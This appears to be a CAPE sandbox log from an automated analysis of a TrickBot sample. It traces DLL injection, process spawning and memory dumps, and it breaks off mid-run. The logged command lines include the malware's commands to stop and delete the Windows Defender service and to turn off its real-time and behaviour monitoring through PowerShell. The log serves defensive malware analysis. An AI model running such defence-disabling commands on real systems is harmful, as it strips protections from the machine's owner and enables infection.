CAPE

Detections: TrickBot Triggered CAPE Tasks: Task #87754: TrickBot


Analysis

Category Package Started Completed Duration Options Log
FILE exe 2019-08-13 22:41:12 2019-08-13 22:45:18 246 seconds Show Options Show Log
route = internet
procdump = 1
2019-08-13 23:41:13,000 [root] INFO: Date set to: 08-13-19, time set to: 22:41:13, timeout set to: 200
2019-08-13 23:41:13,015 [root] DEBUG: Starting analyzer from: C:\jyguetdlo
2019-08-13 23:41:13,015 [root] DEBUG: Storing results at: C:\bbTJiLOfj
2019-08-13 23:41:13,015 [root] DEBUG: Pipe server name: \\.\PIPE\mhKdbgZcE
2019-08-13 23:41:13,015 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-08-13 23:41:13,015 [root] INFO: Automatically selected analysis package "exe"
2019-08-13 23:41:13,546 [root] DEBUG: Started auxiliary module Browser
2019-08-13 23:41:13,546 [root] DEBUG: Started auxiliary module Curtain
2019-08-13 23:41:13,546 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-08-13 23:41:14,730 [modules.auxiliary.digisig] DEBUG: File is not signed.
2019-08-13 23:41:14,730 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-08-13 23:41:14,730 [root] DEBUG: Started auxiliary module DigiSig
2019-08-13 23:41:14,746 [root] DEBUG: Started auxiliary module Disguise
2019-08-13 23:41:14,746 [root] DEBUG: Started auxiliary module Human
2019-08-13 23:41:14,746 [root] DEBUG: Started auxiliary module Screenshots
2019-08-13 23:41:14,746 [root] DEBUG: Started auxiliary module Sysmon
2019-08-13 23:41:14,746 [root] DEBUG: Started auxiliary module Usage
2019-08-13 23:41:14,746 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2019-08-13 23:41:14,746 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2019-08-13 23:41:14,778 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\exlxo5YyAuKqn.exe" with arguments "" with pid 740
2019-08-13 23:41:14,778 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:14,778 [lib.api.process] INFO: 32-bit DLL to inject is C:\jyguetdlo\dll\lvVhLs.dll, loader C:\jyguetdlo\bin\VjcJHVr.exe
2019-08-13 23:41:14,809 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:14,809 [root] DEBUG: Loader: Injecting process 740 (thread 164) with C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:14,809 [root] DEBUG: Process image base: 0x00400000
2019-08-13 23:41:14,809 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:14,825 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0048E000 - 0x77110000
2019-08-13 23:41:14,825 [root] DEBUG: InjectDllViaIAT: Allocated 0x112c bytes for new import table at 0x00490000.
2019-08-13 23:41:14,825 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:14,825 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:14,825 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 740
2019-08-13 23:41:16,836 [lib.api.process] INFO: Successfully resumed process with pid 740
2019-08-13 23:41:16,836 [root] INFO: Added new process to list with pid: 740
2019-08-13 23:41:16,852 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:16,852 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:16,914 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:16,914 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:16,914 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:16,914 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:16,914 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:16,914 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 740 at 0x747e0000, image base 0x400000, stack from 0x286000-0x290000
2019-08-13 23:41:16,914 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\exlxo5YyAuKqn.exe".
2019-08-13 23:41:16,914 [root] INFO: Monitor successfully loaded in process with pid 740.
2019-08-13 23:41:16,914 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-08-13 23:41:16,914 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-08-13 23:41:16,914 [root] DEBUG: DLL loaded at 0x749B0000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-08-13 23:41:16,914 [root] DEBUG: DLL loaded at 0x749A0000: C:\Windows\system32\profapi (0xb000 bytes).
2019-08-13 23:41:16,977 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2019-08-13 23:41:16,977 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-08-13 23:41:16,977 [root] DEBUG: DLL loaded at 0x742A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-08-13 23:41:17,009 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-08-13 23:41:17,009 [root] DEBUG: DLL loaded at 0x749D0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-08-13 23:41:17,023 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-08-13 23:41:17,055 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-08-13 23:41:17,086 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-08-13 23:41:17,101 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-08-13 23:41:17,118 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-08-13 23:41:17,118 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-08-13 23:41:17,180 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-08-13 23:41:17,180 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-08-13 23:41:17,180 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-08-13 23:41:17,180 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-08-13 23:41:17,196 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-08-13 23:41:17,226 [root] INFO: Announced 32-bit process name: ропрУВаЫсенорх.exe pid: 2352
2019-08-13 23:41:17,226 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,226 [lib.api.process] INFO: 32-bit DLL to inject is C:\jyguetdlo\dll\lvVhLs.dll, loader C:\jyguetdlo\bin\VjcJHVr.exe
2019-08-13 23:41:17,226 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,226 [root] DEBUG: Loader: Injecting process 2352 (thread 2216) with C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:17,226 [root] DEBUG: Process image base: 0x00400000
2019-08-13 23:41:17,226 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:17,226 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0048E000 - 0x77110000
2019-08-13 23:41:17,226 [root] DEBUG: InjectDllViaIAT: Allocated 0x112c bytes for new import table at 0x00490000.
2019-08-13 23:41:17,226 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,226 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:17,226 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2352
2019-08-13 23:41:17,226 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:17,226 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,226 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,226 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,243 [root] DEBUG: DLL unloaded from 0x74440000.
2019-08-13 23:41:17,243 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 740
2019-08-13 23:41:17,243 [root] DEBUG: GetHookCallerBase: thread 164 (handle 0x0), return address 0x00407CB7, allocation base 0x00400000.
2019-08-13 23:41:17,243 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-08-13 23:41:17,243 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,243 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2352 at 0x747e0000, image base 0x400000, stack from 0x286000-0x290000
2019-08-13 23:41:17,243 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\ProgramData\??????????????.exe".
2019-08-13 23:41:17,243 [root] INFO: Added new process to list with pid: 2352
2019-08-13 23:41:17,243 [root] INFO: Monitor successfully loaded in process with pid 2352.
2019-08-13 23:41:17,243 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-08-13 23:41:17,243 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-08-13 23:41:17,243 [root] DEBUG: DumpProcess: Module entry point VA is 0x000014E0.
2019-08-13 23:41:17,243 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-08-13 23:41:17,243 [root] DEBUG: DLL loaded at 0x749B0000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-08-13 23:41:17,243 [root] DEBUG: DLL loaded at 0x749A0000: C:\Windows\system32\profapi (0xb000 bytes).
2019-08-13 23:41:17,257 [root] DEBUG: set_caller_info: Adding region at 0x003E0000 to caller regions list (ntdll::LdrLoadDll).
2019-08-13 23:41:17,257 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-08-13 23:41:17,257 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-08-13 23:41:17,257 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\740_1376438991171214382019
2019-08-13 23:41:17,257 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x82400.
2019-08-13 23:41:17,257 [root] DEBUG: DLL unloaded from 0x75140000.
2019-08-13 23:41:17,257 [root] DEBUG: DLL unloaded from 0x749D0000.
2019-08-13 23:41:17,257 [root] INFO: Notified of termination of process with pid 740.
2019-08-13 23:41:17,351 [root] DEBUG: DLL unloaded from 0x75790000.
2019-08-13 23:41:17,382 [root] DEBUG: set_caller_info: Adding region at 0x01E60000 to caller regions list (ntdll::LdrLoadDll).
2019-08-13 23:41:17,398 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2019-08-13 23:41:17,398 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-08-13 23:41:17,398 [root] DEBUG: DLL loaded at 0x741A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-08-13 23:41:17,414 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-08-13 23:41:17,430 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-08-13 23:41:17,460 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:17,507 [root] DEBUG: DLL loaded at 0x74960000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:17,523 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-08-13 23:41:17,555 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-08-13 23:41:17,569 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-08-13 23:41:17,585 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-08-13 23:41:17,601 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-08-13 23:41:17,601 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-08-13 23:41:17,601 [root] DEBUG: DLL loaded at 0x749D0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-08-13 23:41:17,601 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-08-13 23:41:17,617 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-08-13 23:41:17,648 [root] INFO: Announced 64-bit process name: cmd.exe pid: 1092
2019-08-13 23:41:17,648 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,648 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,680 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,680 [root] DEBUG: Loader: Injecting process 1092 (thread 1276) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,694 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:17,694 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,694 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:17,710 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:17,742 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,742 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,742 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1092
2019-08-13 23:41:17,757 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:17,757 [root] DEBUG: DLL unloaded from 0x74340000.
2019-08-13 23:41:17,757 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-08-13 23:41:17,757 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:17,757 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,773 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,773 [root] DEBUG: DLL loaded at 0x724F0000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:17,773 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:17,773 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,773 [root] INFO: Announced 64-bit process name: cmd.exe pid: 2872
2019-08-13 23:41:17,789 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,789 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,789 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,789 [root] DEBUG: Loader: Injecting process 2872 (thread 2840) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,789 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:17,789 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,803 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:17,803 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:17,803 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,803 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,803 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2872
2019-08-13 23:41:17,803 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:17,803 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:17,803 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:17,803 [root] DEBUG: DLL unloaded from 0x724F0000.
2019-08-13 23:41:17,803 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:17,819 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:17,819 [root] DEBUG: DLL loaded at 0x74960000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:17,819 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,819 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,819 [root] INFO: Announced 64-bit process name: cmd.exe pid: 1544
2019-08-13 23:41:17,819 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,819 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,819 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,819 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:17,835 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:17,835 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,835 [root] DEBUG: Loader: Injecting process 1544 (thread 1460) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,835 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:17,835 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,835 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,835 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,835 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1092 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000094000-0x0000000000190000
2019-08-13 23:41:17,835 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2872 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000204000-0x0000000000300000
2019-08-13 23:41:17,835 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:17,835 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c sc stop WinDefend.
2019-08-13 23:41:17,835 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c sc delete WinDefend.
2019-08-13 23:41:17,835 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:17,835 [root] INFO: Added new process to list with pid: 1092
2019-08-13 23:41:17,835 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,835 [root] INFO: Monitor successfully loaded in process with pid 1092.
2019-08-13 23:41:17,835 [root] INFO: Added new process to list with pid: 2872
2019-08-13 23:41:17,835 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,835 [root] INFO: Monitor successfully loaded in process with pid 2872.
2019-08-13 23:41:17,835 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1544
2019-08-13 23:41:17,851 [root] INFO: Process with pid 740 has terminated
2019-08-13 23:41:17,851 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:17,851 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-08-13 23:41:17,851 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:17,851 [root] DEBUG: DLL loaded at 0x724F0000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:17,851 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:17,851 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,851 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,851 [root] INFO: Announced 64-bit process name: cmd.exe pid: 2132
2019-08-13 23:41:17,851 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,851 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,851 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,867 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:17,867 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,867 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:17,867 [root] DEBUG: Loader: Injecting process 2132 (thread 2156) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,867 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:17,867 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,867 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,867 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1544 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000214000-0x0000000000310000
2019-08-13 23:41:17,867 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:17,881 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -DisableRealtimeMonitoring $true.
2019-08-13 23:41:17,881 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:17,881 [root] INFO: Added new process to list with pid: 1544
2019-08-13 23:41:17,881 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,881 [root] INFO: Monitor successfully loaded in process with pid 1544.
2019-08-13 23:41:17,881 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,881 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2132
2019-08-13 23:41:17,881 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:17,881 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:17,881 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:17,881 [root] DEBUG: DLL unloaded from 0x724F0000.
2019-08-13 23:41:17,881 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:17,881 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,898 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,898 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:17,898 [root] DEBUG: DLL loaded at 0x74960000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:17,898 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,898 [root] INFO: Announced 64-bit process name: sc.exe pid: 2244
2019-08-13 23:41:17,898 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:17,898 [root] INFO: Announced 64-bit process name: cmd.exe pid: 2208
2019-08-13 23:41:17,898 [root] INFO: Announced 64-bit process name: sc.exe pid: 1788
2019-08-13 23:41:17,898 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:17,898 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,914 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,914 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:17,914 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,914 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,914 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,914 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,914 [root] INFO: Announced 64-bit process name: powershell.exe pid: 1628
2019-08-13 23:41:17,914 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2132 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x00000000000F4000-0x00000000001F0000
2019-08-13 23:41:17,914 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,914 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,914 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,914 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -DisableBehaviorMonitoring $true.
2019-08-13 23:41:17,914 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,914 [root] DEBUG: Loader: Injecting process 2244 (thread 2328) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,914 [root] DEBUG: Loader: Injecting process 2208 (thread 2212) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,914 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,914 [root] INFO: Added new process to list with pid: 2132
2019-08-13 23:41:17,914 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,914 [root] DEBUG: Process image base: 0x00000000FF730000
2019-08-13 23:41:17,914 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:17,914 [root] INFO: Monitor successfully loaded in process with pid 2132.
2019-08-13 23:41:17,914 [root] DEBUG: Loader: Injecting process 1788 (thread 1648) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,914 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,914 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,914 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,928 [root] DEBUG: Process image base: 0x00000000FF730000
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF73F000 - 0x000007FEFF430000
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:17,928 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:17,928 [root] DEBUG: Loader: Injecting process 1628 (thread 2320) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Allocated 0x1dc bytes for new import table at 0x00000000FF740000.
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:17,928 [root] INFO: Announced 64-bit process name: powershell.exe pid: 2952
2019-08-13 23:41:17,928 [root] DEBUG: Process image base: 0x000000013F390000
